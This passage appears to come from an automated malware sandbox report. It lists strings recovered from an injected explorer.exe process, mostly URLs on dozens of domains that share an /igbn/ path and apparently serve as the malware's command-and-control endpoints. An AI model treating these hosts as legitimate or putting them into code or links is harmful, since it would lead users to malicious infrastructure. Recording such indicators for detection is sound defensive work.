          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.betmonde396.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.betmonde396.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.betmonde396.com/igbn/www.fliptrade.cfd
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.betmonde396.comReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.brasilbikeshopsc.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.brasilbikeshopsc.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.brasilbikeshopsc.com/igbn/www.creatievecontentpeople.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.brasilbikeshopsc.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cargizmos.net
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cargizmos.net/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cargizmos.net/igbn/www.123-tecnicos.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cargizmos.netReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.creatievecontentpeople.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.creatievecontentpeople.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.creatievecontentpeople.com/igbn/www.itk.world
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creatievecontentpeople.com/igbn/www.mlharquitectura.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.creatievecontentpeople.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creatingsobriety.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creatingsobriety.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creatingsobriety.com/igbn/www.rusticramble.online
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creatingsobriety.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enet-insaat.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enet-insaat.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enet-insaat.com/igbn/www.gbraises.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enet-insaat.comReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fliptrade.cfd
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fliptrade.cfd/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fliptrade.cfd/igbn/www.gbraises.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fliptrade.cfdReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freakyressop.xyz
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freakyressop.xyz/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.freakyressop.xyz/igbn/www.nftcopyrights.xyz
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freakyressop.xyz/igbn/www.rusticramble.online
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.freakyressop.xyzReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gbraises.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gbraises.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gbraises.com/igbn/www.bangunrumahkreasi.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gbraises.com/igbn/www.webinarcerdaskanindonesia.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gbraises.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.getrightspt.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.getrightspt.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.getrightspt.com/igbn/www.rumblerain.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.getrightspt.comReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.history-poker.site
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.history-poker.site/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.history-poker.site/igbn/www.brasilbikeshopsc.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.history-poker.siteReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itk.world
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itk.world/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itk.world/igbn/www.betmonde396.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.itk.worldReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.livewey.net
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.livewey.net/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.livewey.net/igbn/www.freakyressop.xyz
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.livewey.netReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mckinleyint.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mckinleyint.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mckinleyint.com/igbn/www.livewey.net
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mckinleyint.comReferer:
          Source: explorer.exe, 00000004.00000003.2284166438.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2363894406.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1465481958.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mlharquitectura.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mlharquitectura.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mlharquitectura.com/igbn/www.azure1224.xyz
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mlharquitectura.com/igbn/www.cargizmos.net
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mlharquitectura.comReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monicadenis.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monicadenis.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monicadenis.com/igbn/www.mckinleyint.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monicadenis.comReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.musiclessonsandmore.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.musiclessonsandmore.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.musiclessonsandmore.com/igbn/www.monicadenis.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.musiclessonsandmore.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftcopyrights.xyz
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftcopyrights.xyz/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftcopyrights.xyz/igbn/www.noticeupluy.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftcopyrights.xyzReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.noticeupluy.com
          Source: explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.noticeupluy.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.noticeupluy.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prolongdogslife.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prolongdogslife.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prolongdogslife.com/igbn/www.enet-insaat.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prolongdogslife.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rumblerain.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rumblerain.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rumblerain.com/igbn/www.creatingsobriety.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rumblerain.comReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rusticramble.online
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rusticramble.online/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rusticramble.online/igbn/K
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rusticramble.online/igbn/www.prolongdogslife.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rusticramble.onlineReferer:
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.s5agents.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.s5agents.com/igbn/
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.s5agents.com/igbn/www.getrightspt.com
          Source: explorer.exe, 00000004.00000003.2289858861.000000000C17D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2371254020.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2288530916.000000000C17C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.s5agents.comReferer:
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webinarcerdaskanindonesia.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webinarcerdaskanindonesia.com/igbn/
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webinarcerdaskanindonesia.com/igbn/www.mlharquitectura.com
          Source: explorer.exe, 00000010.00000002.2676388545.000000000941A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webinarcerdaskanindonesia.comReferer:
          Source: explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2368129929.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2289901418.000000000BCA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
          Source: explorer.exe, 00000004.00000000.1469970738.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
